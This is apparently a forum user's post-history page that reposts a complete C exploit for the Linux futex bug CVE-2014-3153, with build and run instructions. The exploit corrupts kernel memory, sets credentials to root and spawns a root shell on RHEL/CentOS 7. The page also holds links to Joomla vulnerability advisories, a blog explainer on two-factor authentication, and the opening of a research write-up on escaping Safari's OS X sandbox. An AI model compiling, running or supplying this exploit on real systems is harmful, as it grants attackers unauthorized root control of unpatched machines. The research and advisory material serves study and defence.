Jump to content

Nytro

Administrators
  • Posts

    18772
  • Joined

  • Last visited

  • Days Won

    729

Everything posted by Nytro

  1. [h=1]Linux Kernel libfutex Local Root for RHEL/CentOS 7.0.1406[/h] /* * CVE-2014-3153 exploit for RHEL/CentOS 7.0.1406 * By Kaiqu Chen ( kaiquchen@163.com ) * Based on libfutex and the expoilt for Android by GeoHot. * * Usage: * $gcc exploit.c -o exploit -lpthread * $./exploit * */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <stdbool.h> #include <pthread.h> #include <fcntl.h> #include <signal.h> #include <string.h> #include <errno.h> #include <linux/futex.h> #include <sys/socket.h> #include <sys/mman.h> #include <sys/syscall.h> #include <sys/resource.h> #include <arpa/inet.h> #include <netinet/in.h> #include <netinet/tcp.h> #define ARRAY_SIZE(a) (sizeof (a) / sizeof (*(a))) #define FUTEX_WAIT_REQUEUE_PI 11 #define FUTEX_CMP_REQUEUE_PI 12 #define USER_PRIO_BASE 120 #define LOCAL_PORT 5551 #define SIGNAL_HACK_KERNEL 12 #define SIGNAL_THREAD_EXIT 10 #define OFFSET_PID 0x4A4 #define OFFSET_REAL_PARENT 0x4B8 #define OFFSET_CRED 0x668 #define SIZEOF_CRED 160 #define SIZEOF_TASK_STRUCT 2912 #define OFFSET_ADDR_LIMIT 0x20 #define PRIO_LIST_OFFSET 8 #define NODE_LIST_OFFSET (PRIO_LIST_OFFSET + sizeof(struct list_head)) #define PRIO_LIST_TO_WAITER(list) (((void *)(list)) - PRIO_LIST_OFFSET) #define WAITER_TO_PRIO_LIST(waiter) (((void *)(waiter)) + PRIO_LIST_OFFSET) #define NODE_LIST_TO_WAITER(list) (((void *)(list)) - NODE_LIST_OFFSET) #define WAITER_TO_NODE_LIST(waiter) (((void *)(waiter)) + NODE_LIST_OFFSET) #define MUTEX_TO_PRIO_LIST(mutex) (((void *)(mutex)) + sizeof(long)) #define MUTEX_TO_NODE_LIST(mutex) (((void *)(mutex)) + sizeof(long) + sizeof(struct list_head)) //////////////////////////////////////////////////////////////////// struct task_struct; struct thread_info { struct task_struct *task; void *exec_domain; int flags; int status; int cpu; int preempt_count; void *addr_limit; }; struct list_head { struct list_head *next; struct list_head *prev; }; struct plist_head { struct list_head node_list; }; struct plist_node { int prio; 
struct list_head prio_list; struct list_head node_list; }; struct rt_mutex { unsigned long wait_lock; struct plist_head wait_list; struct task_struct *owner; }; struct rt_mutex_waiter { struct plist_node list_entry; struct plist_node pi_list_entry; struct task_struct *task; struct rt_mutex *lock; }; struct mmsghdr { struct msghdr msg_hdr; unsigned int msg_len; }; struct cred { int usage; int uid; /* real UID of the task */ int gid; /* real GID of the task */ int suid; /* saved UID of the task */ int sgid; /* saved GID of the task */ int euid; /* effective UID of the task */ int egid; /* effective GID of the task */ int fsuid; /* UID for VFS ops */ int fsgid; /* GID for VFS ops */ }; //////////////////////////////////////////////////////////////////// static int swag = 0; static int swag2 = 0; static int main_pid; static pid_t waiter_thread_tid; static pthread_mutex_t hacked_lock; static pthread_cond_t hacked; static pthread_mutex_t done_lock; static pthread_cond_t done; static pthread_mutex_t is_thread_desched_lock; static pthread_cond_t is_thread_desched; static volatile int do_socket_tid_read = 0; static volatile int did_socket_tid_read = 0; static volatile int do_dm_tid_read = 0; static volatile int did_dm_tid_read = 0; static pid_t last_tid = 0; static volatile int_sync_time_out = 0; struct thread_info thinfo; char task_struct_buf[sizeOF_TASK_STRUCT]; struct cred cred_buf; struct thread_info *hack_thread_stack = NULL; pthread_t thread_client_to_setup_rt_waiter; int listenfd; int sockfd; int clientfd; //////////////////////////////////////////////////////////////// int gettid() { return syscall(__NR_gettid); } ssize_t read_pipe(void *kbuf, void *ubuf, size_t count) { int pipefd[2]; ssize_t len; pipe(pipefd); len = write(pipefd[1], kbuf, count); if (len != count) { printf("Thread %d failed in reading @ %p : %d %d\n", gettid(), kbuf, (int)len, errno); while(1) { sleep(10); } } read(pipefd[0], ubuf, count); close(pipefd[0]); close(pipefd[1]); return len; } ssize_t 
write_pipe(void *kbuf, void *ubuf, size_t count) { int pipefd[2]; ssize_t len; pipe(pipefd); write(pipefd[1], ubuf, count); len = read(pipefd[0], kbuf, count); if (len != count) { printf("Thread %d failed in writing @ %p : %d %d\n", gettid(), kbuf, (int)len, errno); while(1) { sleep(10); } } close(pipefd[0]); close(pipefd[1]); return len; } int pthread_cancel_immediately(pthread_t thid) { pthread_kill(thid, SIGNAL_THREAD_EXIT); pthread_join(thid, NULL); return 0; } void set_addr_limit(void *sp) { long newlimit = -1; write_pipe(sp + OFFSET_ADDR_LIMIT, (void *)&newlimit, sizeof(long)); } void set_cred(struct cred *kcred) { struct cred cred_buf; int len; len = read_pipe(kcred, &cred_buf, sizeof(cred_buf)); cred_buf.uid = cred_buf.euid = cred_buf.suid = cred_buf.fsuid = 0; cred_buf.gid = cred_buf.egid = cred_buf.sgid = cred_buf.fsgid = 0; len = write_pipe(kcred, &cred_buf, sizeof(cred_buf)); } struct rt_mutex_waiter *pwaiter11; void set_parent_cred(void *sp, int parent_tid) { int len; int tid; struct task_struct *pparent; struct cred *pcred; set_addr_limit(sp); len = read_pipe(sp, &thinfo, sizeof(thinfo)); if(len != sizeof(thinfo)) { printf("Read %p error %d\n", sp, len); } void *ptask = thinfo.task; len = read_pipe(ptask, task_struct_buf, SIZEOF_TASK_STRUCT); tid = *(int *)(task_struct_buf + OFFSET_PID); while(tid != 0 && tid != parent_tid) { pparent = *(struct task_struct **)(task_struct_buf + OFFSET_REAL_PARENT); len = read_pipe(pparent, task_struct_buf, SIZEOF_TASK_STRUCT); tid = *(int *)(task_struct_buf + OFFSET_PID); } if(tid == parent_tid) { pcred = *(struct cred **)(task_struct_buf + OFFSET_CRED); set_cred(pcred); } else printf("Pid %d not found\n", parent_tid); return; } static int read_voluntary_ctxt_switches(pid_t pid) { char filename[256]; FILE *fp; int vcscnt = -1; sprintf(filename, "/proc/self/task/%d/status", pid); fp = fopen(filename, "rb"); if (fp) { char filebuf[4096]; char *pdest; fread(filebuf, 1, sizeof filebuf, fp); pdest = strstr(filebuf, 
"voluntary_ctxt_switches"); vcscnt = atoi(pdest + 0x19); fclose(fp); } return vcscnt; } static void sync_timeout_task(int sig) { int_sync_time_out = 1; } static int sync_with_child_getchar(pid_t pid, int volatile *do_request, int volatile *did_request) { while (*do_request == 0) { } printf("Press RETURN after one second..."); *did_request = 1; getchar(); return 0; } static int sync_with_child(pid_t pid, int volatile *do_request, int volatile *did_request) { struct sigaction act; int vcscnt; int_sync_time_out = 0; act.sa_handler = sync_timeout_task; sigemptyset(&act.sa_mask); act.sa_flags = 0; act.sa_restorer = NULL; sigaction(SIGALRM, &act, NULL); alarm(3); while (*do_request == 0) { if (int_sync_time_out) return -1; } alarm(0); vcscnt = read_voluntary_ctxt_switches(pid); *did_request = 1; while (read_voluntary_ctxt_switches(pid) != vcscnt + 1) { usleep(10); } return 0; } static void sync_with_parent(int volatile *do_request, int volatile *did_request) { *do_request = 1; while (*did_request == 0) { } } void fix_rt_mutex_waiter_list(struct rt_mutex *pmutex) { struct rt_mutex_waiter *pwaiter6, *pwaiter7; struct rt_mutex_waiter waiter6, waiter7; struct rt_mutex mutex; if(!pmutex) return; read_pipe(pmutex, &mutex, sizeof(mutex)); pwaiter6 = NODE_LIST_TO_WAITER(mutex.wait_list.node_list.next); if(!pwaiter6) return; read_pipe(pwaiter6, &waiter6, sizeof(waiter6)); pwaiter7 = NODE_LIST_TO_WAITER(waiter6.list_entry.node_list.next); if(!pwaiter7) return; read_pipe(pwaiter7, &waiter7, sizeof(waiter7)); waiter6.list_entry.prio_list.prev = waiter6.list_entry.prio_list.next; waiter7.list_entry.prio_list.next = waiter7.list_entry.prio_list.prev; mutex.wait_list.node_list.prev = waiter6.list_entry.node_list.next; waiter7.list_entry.node_list.next = waiter6.list_entry.node_list.prev; write_pipe(pmutex, &mutex, sizeof(mutex)); write_pipe(pwaiter6, &waiter6, sizeof(waiter6)); write_pipe(pwaiter7, &waiter7, sizeof(waiter7)); } static void void_handler(int signum) { pthread_exit(0); } 
static void kernel_hack_task(int signum) { struct rt_mutex *prt_mutex, rt_mutex; struct rt_mutex_waiter rt_waiter11; int tid = syscall(__NR_gettid); int pid = getpid(); set_parent_cred(hack_thread_stack, main_pid); read_pipe(pwaiter11, (void *)&rt_waiter11, sizeof(rt_waiter11)); prt_mutex = rt_waiter11.lock; read_pipe(prt_mutex, (void *)&rt_mutex, sizeof(rt_mutex)); void *ptask_struct = rt_mutex.owner; ptask_struct = (void *)((long)ptask_struct & ~ 0xF); int len = read_pipe(ptask_struct, task_struct_buf, SIZEOF_TASK_STRUCT); int *ppid = (int *)(task_struct_buf + OFFSET_PID); void **pstack = (void **)&task_struct_buf[8]; void *owner_sp = *pstack; set_addr_limit(owner_sp); pthread_mutex_lock(&hacked_lock); pthread_cond_signal(&hacked); pthread_mutex_unlock(&hacked_lock); } static void *call_futex_lock_pi_with_priority(void *arg) { int prio; struct sigaction act; int ret; prio = (long)arg; last_tid = syscall(__NR_gettid); pthread_mutex_lock(&is_thread_desched_lock); pthread_cond_signal(&is_thread_desched); act.sa_handler = void_handler; sigemptyset(&act.sa_mask); act.sa_flags = 0; act.sa_restorer = NULL; sigaction(SIGNAL_THREAD_EXIT, &act, NULL); act.sa_handler = kernel_hack_task; sigemptyset(&act.sa_mask); act.sa_flags = 0; act.sa_restorer = NULL; sigaction(SIGNAL_HACK_KERNEL, &act, NULL); setpriority(PRIO_PROCESS, 0, prio); pthread_mutex_unlock(&is_thread_desched_lock); sync_with_parent(&do_dm_tid_read, &did_dm_tid_read); ret = syscall(__NR_futex, &swag2, FUTEX_LOCK_PI, 1, 0, NULL, 0); return NULL; } static pthread_t create_thread_do_futex_lock_pi_with_priority(int prio) { pthread_t th4; pid_t pid; do_dm_tid_read = 0; did_dm_tid_read = 0; pthread_mutex_lock(&is_thread_desched_lock); pthread_create(&th4, 0, call_futex_lock_pi_with_priority, (void *)(long)prio); pthread_cond_wait(&is_thread_desched, &is_thread_desched_lock); pid = last_tid; sync_with_child(pid, &do_dm_tid_read, &did_dm_tid_read); pthread_mutex_unlock(&is_thread_desched_lock); return th4; } static int 
server_for_setup_rt_waiter(void) { int sockfd; int yes = 1; struct sockaddr_in addr = {0}; sockfd = socket(AF_INET, SOCK_STREAM, SOL_TCP); setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, (char *)&yes, sizeof(yes)); addr.sin_family = AF_INET; addr.sin_port = htons(LOCAL_PORT); addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); bind(sockfd, (struct sockaddr *)&addr, sizeof(addr)); listen(sockfd, 1); listenfd = sockfd; return accept(sockfd, NULL, NULL); } static int connect_server_socket(void) { int sockfd; struct sockaddr_in addr = {0}; int ret; int sock_buf_size; sockfd = socket(AF_INET, SOCK_STREAM, SOL_TCP); if (sockfd < 0) { printf("socket failed\n"); usleep(10); } else { addr.sin_family = AF_INET; addr.sin_port = htons(LOCAL_PORT); addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); } while (connect(sockfd, (struct sockaddr *)&addr, 16) < 0) { usleep(10); } sock_buf_size = 1; setsockopt(sockfd, SOL_SOCKET, SO_SNDBUF, (char *)&sock_buf_size, sizeof(sock_buf_size)); return sockfd; } unsigned long iov_base0, iov_basex; size_t iov_len0, iov_lenx; static void *client_to_setup_rt_waiter(void *waiter_plist) { int sockfd; struct mmsghdr msgvec[1]; struct iovec msg_iov[8]; unsigned long databuf[0x20]; int i; int ret; struct sigaction act; act.sa_handler = void_handler; sigemptyset(&act.sa_mask); act.sa_flags = 0; act.sa_restorer = NULL; sigaction(SIGNAL_THREAD_EXIT, &act, NULL); waiter_thread_tid = syscall(__NR_gettid); setpriority(PRIO_PROCESS, 0, 12); sockfd = connect_server_socket(); clientfd = sockfd; for (i = 0; i < ARRAY_SIZE(databuf); i++) { databuf = (unsigned long)waiter_plist; } for (i = 0; i < ARRAY_SIZE(msg_iov); i++) { msg_iov.iov_base = waiter_plist; msg_iov.iov_len = (long)waiter_plist; } msg_iov[1].iov_base = (void *)iov_base0; msgvec[0].msg_hdr.msg_name = databuf; msgvec[0].msg_hdr.msg_namelen = sizeof databuf; msgvec[0].msg_hdr.msg_iov = msg_iov; msgvec[0].msg_hdr.msg_iovlen = ARRAY_SIZE(msg_iov); msgvec[0].msg_hdr.msg_control = databuf; 
msgvec[0].msg_hdr.msg_controllen = ARRAY_SIZE(databuf); msgvec[0].msg_hdr.msg_flags = 0; msgvec[0].msg_len = 0; syscall(__NR_futex, &swag, FUTEX_WAIT_REQUEUE_PI, 0, 0, &swag2, 0); sync_with_parent(&do_socket_tid_read, &did_socket_tid_read); ret = 0; while (1) { ret = syscall(__NR_sendmmsg, sockfd, msgvec, 1, 0); if (ret <= 0) { break; } else printf("sendmmsg ret %d\n", ret); } return NULL; } static void plist_set_next(struct list_head *node, struct list_head *head) { node->next = head; head->prev = node; node->prev = head; head->next = node; } static void setup_waiter_params(struct rt_mutex_waiter *rt_waiters) { rt_waiters[0].list_entry.prio = USER_PRIO_BASE + 9; rt_waiters[1].list_entry.prio = USER_PRIO_BASE + 13; plist_set_next(&rt_waiters[0].list_entry.prio_list, &rt_waiters[1].list_entry.prio_list); plist_set_next(&rt_waiters[0].list_entry.node_list, &rt_waiters[1].list_entry.node_list); } static bool do_exploit(void *waiter_plist) { void *magicval, *magicval2; struct rt_mutex_waiter *rt_waiters; pid_t pid; pid_t pid6, pid7, pid12, pid11; rt_waiters = PRIO_LIST_TO_WAITER(waiter_plist); syscall(__NR_futex, &swag2, FUTEX_LOCK_PI, 1, 0, NULL, 0); while (syscall(__NR_futex, &swag, FUTEX_CMP_REQUEUE_PI, 1, 0, &swag2, swag) != 1) { usleep(10); } pthread_t th6 = create_thread_do_futex_lock_pi_with_priority(6); pthread_t th7 = create_thread_do_futex_lock_pi_with_priority(7); swag2 = 0; do_socket_tid_read = 0; did_socket_tid_read = 0; syscall(__NR_futex, &swag2, FUTEX_CMP_REQUEUE_PI, 1, 0, &swag2, swag2); if (sync_with_child_getchar(waiter_thread_tid, &do_socket_tid_read, &did_socket_tid_read) < 0) { return false; } setup_waiter_params(rt_waiters); magicval = rt_waiters[0].list_entry.prio_list.next; printf("Checking whether exploitable.."); pthread_t th11 = create_thread_do_futex_lock_pi_with_priority(11); if (rt_waiters[0].list_entry.prio_list.next == magicval) { printf("failed\n"); return false; } printf("OK\nSeaching good magic...\n"); magicval = 
rt_waiters[0].list_entry.prio_list.next; pthread_cancel_immediately(th11); pthread_t th11_1, th11_2; while(1) { setup_waiter_params(rt_waiters); th11_1 = create_thread_do_futex_lock_pi_with_priority(11); magicval = rt_waiters[0].list_entry.prio_list.next; hack_thread_stack = (struct thread_info *)((unsigned long)magicval & 0xffffffffffffe000); rt_waiters[1].list_entry.node_list.prev = (void *)&hack_thread_stack->addr_limit; th11_2 = create_thread_do_futex_lock_pi_with_priority(11); magicval2 = rt_waiters[1].list_entry.node_list.prev; printf("magic1=%p magic2=%p\n", magicval, magicval2); if(magicval < magicval2) { printf("Good magic found\nHacking...\n"); break; } else { pthread_cancel_immediately(th11_1); pthread_cancel_immediately(th11_2); } } pwaiter11 = NODE_LIST_TO_WAITER(magicval2); pthread_mutex_lock(&hacked_lock); pthread_kill(th11_1, SIGNAL_HACK_KERNEL); pthread_cond_wait(&hacked, &hacked_lock); pthread_mutex_unlock(&hacked_lock); close(listenfd); struct rt_mutex_waiter waiter11; struct rt_mutex *pmutex; int len = read_pipe(pwaiter11, &waiter11, sizeof(waiter11)); if(len != sizeof(waiter11)) { pmutex = NULL; } else { pmutex = waiter11.lock; } fix_rt_mutex_waiter_list(pmutex); pthread_cancel_immediately(th11_1); pthread_cancel_immediately(th11_2); pthread_cancel_immediately(th7); pthread_cancel_immediately(th6); close(clientfd); pthread_cancel_immediately(thread_client_to_setup_rt_waiter); exit(0); } #define MMAP_ADDR_BASE 0x0c000000 #define MMAP_LEN 0x0c001000 int main(int argc, char *argv[]) { unsigned long mapped_address; void *waiter_plist; printf("CVE-2014-3153 exploit by Chen Kaiqu(kaiquchen@163.com)\n"); main_pid = gettid(); if(fork() == 0) { iov_base0 = (unsigned long)mmap((void *)0xb0000000, 0x10000, PROT_READ | PROT_WRITE | PROT_EXEC, /*MAP_POPULATE |*/ MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0); if (iov_base0 < 0xb0000000) { printf("mmap failed?\n"); return 1; } iov_len0 = 0x10000; iov_basex = (unsigned long)mmap((void *)MMAP_ADDR_BASE, 
MMAP_LEN, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0); if (iov_basex < MMAP_ADDR_BASE) { printf("mmap failed?\n"); return 1; } iov_lenx = MMAP_LEN; waiter_plist = (void *)iov_basex + 0x400; pthread_create(&thread_client_to_setup_rt_waiter, NULL, client_to_setup_rt_waiter, waiter_plist); sockfd = server_for_setup_rt_waiter(); if (sockfd < 0) { printf("Server failed\n"); return 1; } if (!do_exploit(waiter_plist)) { return 1; } return 0; } while(getuid()) usleep(100); execl("/bin/bash", "bin/bash", NULL); return 0; } Sursa: http://www.exploit-db.com/exploits/35370/
  2. Adu cateva argumente. http://threatpost.com/joomla-fixes-critical-sql-injection-vulnerability/104717 http://developer.joomla.org/security/578-20140301-core-sql-injection.html http://www.exploit-db.com/exploits/31459/ http://chingshiong.blogspot.ro/2012/04/joomla-cms-251-blind-sql-injection.html http://developer.joomla.org/security/580-20140303-core-xss-vulnerability.html http://developer.joomla.org/security/570-core-xss-20131101.html http://developer.joomla.org/security/593-20140901-core-xss-vulnerability.html http://www.securityfocus.com/archive/1/527765/30/0/threaded
  3. What is Two-Factor Authentication? Where Should You Use It? June 9, 2014 Brian Donohue We’ve recorded podcasts about it. We’ve discussed it at length in a number of screencasts (which I have kindly embedded below). We’ve mentioned it indirectly in countless articles. But we’ve never taken the time to dedicate an article solely to explaining what two-factor authentication is, how it works, and where you should use it. What is Two-Factor Authentication? Two-factor authentication is a feature offered by a number of online service providers that adds an additional layer of security to the account login process by requiring that a user provide two forms of authentication. The first form – in general – is your password. The second factor can be any number of things. Perhaps the most popular second factor of authentication is the SMS or email code. The general theory behind two-factor is that, in order to log in, you must know something and possess something. Thus, in order to access your company’s virtual private network, you might need a password and a USB stick. Two-factor is no panacea to prevent account hijacks, but it’s a formidable barrier to anything that would try to compromise an account protected by it. Two-factor is no panacea to prevent account hijacks, but it’s a formidable barrier to anything that would try to compromise an account protected by it. I think it is pretty well known that passwords are severely flawed: weak ones are easy to remember and easy to guess; strong ones are hard to guess but hard to remember. Because of this, people who are already bad at creating passwords, use the same ones over and over again. Two-factor at least makes it so an attacker would have to figure out your password and have access to your second factor, which would generally mean stealing your cell phone or compromising your email account. What is two-factor authentication and where should you enable it? 
#security #passwords Tweet There’s been a race to replace passwords, but nothing has emerged. As it stands, a good two-factor authentication system is about the best protection you can have. The second benefit to two-factor authentication systems, especially the ones that involve the reception of email and SMS passcodes, is that they let you know when someone has guessed your password. As I’ve said probably 1000 times, if you receive a two-factor authentication code on your mobile device or in your email account and you weren’t trying to login to the account associated with it, that’s a pretty good sign that someone has guessed your password and is attempting to hijack your account. When or if this ever happens, it’s probably a good time to go ahead and change your password. On What Accounts Should I Enable Two-Factor? The simple rule regarding when and where you should enable two-factor is this: If the service in question offers it and you deem that account valuable, then enable it. So, Pinterest? I don’t know. Maybe. If I had a Pinterest account I probably wouldn’t be willing to go through the hassle of entering two authenticators every time I go to log in. However, your online banking, primary and secondary email (especially if you have a dedicated account recovery email address), valued social networks (Facebook and Twitter perhaps), and definitely your AppleID or iCloud or whatever account controls your Android device, if you have one, should all be protected by a second factor of authentication. Watch this video demonstrating how to set up two-factor for iCloud Obviously you would want to consider requiring that second factor for any work-related accounts as well. If you manage websites, you’ll want to consider locking down your registration service account, whether it’s WordPress or GoDaddy or NameCheap or some other. We also recommend turning it on for any account that may have a credit or debit card associated with it: PayPal, eBay, eTrade, etc. 
Again, your decision to turn on two-factor should be based on how devastating it would be to lose access to any account that offers the feature. This video demonstrates how to set up two-factor on Facebook Are There Any Other Forms of Two-Factor? Thus far, we have discussed two-factor as a code sent to your mobile device or email account and as a USB stick often used for VPN access along with a password. There are also keychain code generators, like RSA’s SecureID, which are generally used in corporate environments. At this point, these are the predominant forms of two-factor. However, there are certainly others as well. Transaction authentication numbers (TAN) are a bit of an old fashioned second factor form. They were popular in Europe, and I have never actually used one myself, but if I understand correctly, your bank would send you a list of TANs (on paper) and every time you performed a transaction online you would enter one of those TANs to authenticate it. The ATM is another old-school example of two-factor authentication. The thing you know is your PIN; the thing you possess is your debit card. From paper to the future, there has been much buzz about biometric two-factor. Some systems require a password and a fingerprint, iris scan, heartbeat, or some other biological measure. Wearables are gaining momentum too. Some systems require you to wear a special bracelet or other accessory with some sort of embedded radio frequency chip. I have read research papers about electromagnetic tattoos that could be used for a second factor of authentication. Both Google and Facebook have mobile application code generators, which let users create their own one-time password in place of an SMS or email code. This video demonstrates how to set up two-factor on Gmail Sursa: What is Two-Factor Authentication? Where Should You Use It? | Kaspersky Lab Official Blog
  4. pwn4fun Spring 2014 - Safari - Part II Posted by Ian Beer TL;DR An OS X GPU driver trusted a user-supplied kernel C++ object pointer and called a virtual function. The IOKit registry contained kernel pointers which were used to defeat kASLR. A kernel ROP payload ran Calculator.app as root using a convenient kernel API. Overview of part I We finished part I with the ability to load our own native library into the Safari renderer process on OS X by exploiting an integer truncation bug in the Safari javascript engine. Here in part II we’ll take a look at how sandboxing works on OS X, revise some OS X fundamentals and then exploit two kernel bugs to launch Calculator.app running as root from inside the Safari sandbox. Safari process model Safari’s sandboxing model is based on privilege separation. It uses the WebKit2 framework to communicate between multiple separate processes which collectively form the Safari browser. Each of these processes is responsible for a different part of the browser and sandboxed to only allow access to the system resources it requires. Specifically Safari is split into four distinct process families: WebProcesses are the renderers - they’re responsible for actually drawing web pages as well as dealing with most active web content such as javascript NetworkProcess is the process which talks to the network PluginProcesses are the processes which host native plugins like Adobe Flash UIProcess is the unsandboxed parent of all the other processes and is responsible for coordinating the activity of the sandboxed processes such that a webpage is actually displayed to the user which they can interact with The Web, Network and Plugin process families are sandboxed. In order to understand how to break out of the WebProcess that we find ourselves in we’ve first got to understand how this sandbox is implemented. 
OS X sandboxing primitives OS X uses the Mandatory Access Control (MAC) paradigm to implement sandboxing, specifically it uses the TrustedBSD framework. Use of the MAC sandboxing paradigm implies that whenever a sandboxed process tries to acquire access to some system resource, for example by opening a file or creating a network socket, the OS will first check: Does this particular process have the right to do this? An implementation of sandboxing using TrustedBSD has two parts: firstly, hooks must be added to the kernel code wherever a sandboxing decision is required. A TrustedBSD hook looks like this: [FONT=Courier New]/* bsd/kern/uipc_syscalls.c */[/FONT] [FONT=Courier New]int socket(struct proc *p, struct socket_args *uap, int32_t *retval)[/FONT] [FONT=Courier New]{[/FONT] [FONT=Courier New]#if CONFIG_MACF_SOCKET_SUBSET[/FONT] [FONT=Courier New][I]if ((error = mac_socket_check_create(kauth_cred_get(), uap->domain,[/I][/FONT] [FONT=Courier New][I] uap->type, uap->protocol)) != 0)[/I][/FONT] [FONT=Courier New][I]return (error);[/I][/FONT] [FONT=Courier New]#endif /* MAC_SOCKET_SUBSET */[/FONT] [FONT=Courier New]...[/FONT] That snippet of code is from the implementation of the socket syscall on OS X. 
If MAC support has been enabled at compile time then the very first thing the socket syscall implementation will do is call mac_socket_check_create, passing the credentials of the calling process and the domain, type and protocol of the requested socket: [FONT=Courier New]/* security/mac_socket.h */[/FONT] [FONT=Courier New]int mac_socket_check_create(kauth_cred_t cred, int domain, int type, int protocol)[/FONT] [FONT=Courier New]{[/FONT] [FONT=Courier New]int error;[/FONT] [FONT=Courier New]if (!mac_socket_enforce)[/FONT] [FONT=Courier New]return 0;[/FONT] [FONT=Courier New]MAC_CHECK(socket_check_create, cred, domain, type, protocol);[/FONT] [FONT=Courier New]return (error);[/FONT] [FONT=Courier New]}[/FONT] Here we see that if the enforcement of MAC on sockets hasn’t been globally disabled (mac_socket_enforce is a variable exposed by the sysctl interface) then this function falls through to the MAC_CHECK macro: [FONT=Courier New]/* security/mac_internal.h */[/FONT] [FONT=Courier New]#define MAC_CHECK(check, args...) do { \[/FONT] [FONT=Courier New]for (i = 0; i < mac_policy_list.staticmax; i++) { \[/FONT] [FONT=Courier New]mpc = mac_policy_list.entries[i].mpc; \[/FONT] [FONT=Courier New]...[/FONT] [FONT=Courier New]if (mpc->mpc_ops->mpo_ ## check != NULL) \[/FONT] [FONT=Courier New]error = mac_error_select( \[/FONT] [FONT=Courier New]mpc->mpc_ops->mpo_ ## check (args), \[/FONT] [FONT=Courier New] error);[/FONT] This macro is the core of TrustedBSD. mac_policy_list.entries (the first highlighted chunk) is a list of policies and the second highlighted chunk is TrustedBSD consulting the policy. In actual fact a policy is nothing more than a C struct (struct policy_ops) containing function pointers (one per hook type) and consultation of a policy simply means calling the right function pointer in that struct. If that policy function returns 0 (or isn’t implemented at all by the policy) then the MAC check succeeds. 
If the policy function returns a non-zero value then the MAC check fails and, in the case of this socket hook, the syscall will fail passing the error code back up to userspace and the rest of the socket syscall won’t be executed. The second part of an implementation of sandboxing using TrustedBSD is the provision of these policy modules. Although TrustedBSD allows multiple policy modules to be present at the same time in practice on OS X there’s only one and it’s implemented in its own kernel extension: Sandbox.kext. When it's loaded Sandbox.kext registers itself as a policy with TrustedBSD by passing a pointer to its policy_ops structure. TrustedBSD adds this to the mac_policy_list.entries array seen earlier and will then call into Sandbox.kext whenever a sandboxing decision is required. Sandbox.kext and the OS X sandbox policy_ops This paper from Dionysus Blazakis, this talk from Meder Kydyraliev and this reference from @osxreverser go into great detail about Sandbox.kext and its operation and usage. Summarizing those linked resources, every process can have a unique sandbox profile. For (almost) every MAC hook type Sandbox.kext allows a sandbox profile to specify a decision tree to be used to determine whether the MAC check should pass or fail. This decision tree is expressed in a simple scheme-like DSL built from tuples of actions, operations and filters (for a more complete guide to the syntax refer to the linked docs): (action operation filter) Actions determine whether a particular rule corresponds to passing or failing the MAC check. Actions are the literals allow and deny. Operations define which MAC hooks this rule applies to. For example the file-read operation allows restricting read access to files. Filters allow a more granular application of operations, for example a filter applied to the file-read operation could define a specific file which is or isn’t allowed. 
Here’s a snippet from the WebProcess sandbox profile to illustrate that: [FONT=Courier New](deny default (with partial-symbolication))[/FONT] [FONT=Courier New]...[/FONT] [FONT=Courier New](allow file-read*[/FONT] [FONT=Courier New] ;; Basic system paths[/FONT] [FONT=Courier New] (subpath "/Library/Dictionaries")[/FONT] [FONT=Courier New] (subpath "/Library/Fonts")[/FONT] [FONT=Courier New] (subpath "/Library/Frameworks")[/FONT] [FONT=Courier New] (subpath "/Library/Managed Preferences")[/FONT] [FONT=Courier New] (subpath "/Library/Speech/Synthesizers")[/FONT] [FONT=Courier New] (regex #"^/private/etc/(hosts|group|passwd)$")[/FONT] [FONT=Courier New]...[/FONT] [FONT=Courier New])[/FONT] As you can see sandbox profiles are very readable on OS X. It’s usually quite clear what any particular sandbox profile allows and denies. In this example the profile is using regular expressions to define allowed file paths (there’s a small regex matching engine in the kernel in AppleMatch.kext.) Sandbox.kext also has a mechanism which allows userspace programs to ask for policy decisions. The main use of this is to restrict access to system IPC services, access to which isn’t mediated by the kernel (so there’s nowhere to put a MAC hook) but by the userspace daemon launchd. Enumerating the attack surface of a sandboxed process Broadly speaking there are two aspects to consider when enumerating the attack surface reachable from within a particular sandbox on OS X: Actions which are specifically allowed by the sandbox policy - these are easy to enumerate by looking at the sandbox policy files. Those actions which are allowed because either because the Sandbox.kext policy_ops doesn’t implement the hook callback or because there’s no hook in place at all. 
The Safari WebProcess sandbox profile is located here: /System/Library/StagedFrameworks/Safari/WebKit.framework/Versions/A/Resources/com.apple.WebProcess.sb This profile uses an import statement to load the contents of /System/Library/Sandbox/Profiles/system.sb which uses the define statement to declare various broad sandboxing rulesets which define all the rules required to use complete OS X subsystems such as graphics or networking. Amongst others the Webprocess.sb profile uses (system-graphics) which is defined here in system.sb: [FONT=Courier New](define (system-graphics)[/FONT] [FONT=Courier New]...[/FONT] [FONT=Courier New] (allow iokit-open[/FONT] [FONT=Courier New] (iokit-connection "IOAccelerator")[/FONT] [FONT=Courier New] (iokit-user-client-class "IOAccelerationUserClient")[/FONT] [FONT=Courier New] (iokit-user-client-class "IOSurfaceRootUserClient")[/FONT] [FONT=Courier New] (iokit-user-client-class "IOSurfaceSendRight"))[/FONT] [FONT=Courier New] )[/FONT] [FONT=Courier New])[/FONT] This tells us that the WebProcess sandbox has pretty much unrestricted access to the GPU drivers. In order to understand what the iokit-user-client-class actually means and what this gives us access to we have to step back and take a look at the various parts of OS X involved in the operation of device drivers. OS X kernel fundamentals There are two great books I’d recommend to learn more about the OS X kernel: the older but still relevant “Mac OS X Internals” by Amit Singh and the more recent “Mac OS X and iOS Internals: To the Apple’s Core” by Jonathan Levin. The OS X wikipedia article contains a detailed taxonomic discussion of OS X and its place in the UNIX phylogenetic tree but for our purposes it’s sufficient to divide the OS X kernel into three broad subsystems which collectively are known as XNU: BSD The majority of OS X syscalls are BSD syscalls. The BSD-derived code is responsible for things like file systems and networking. 
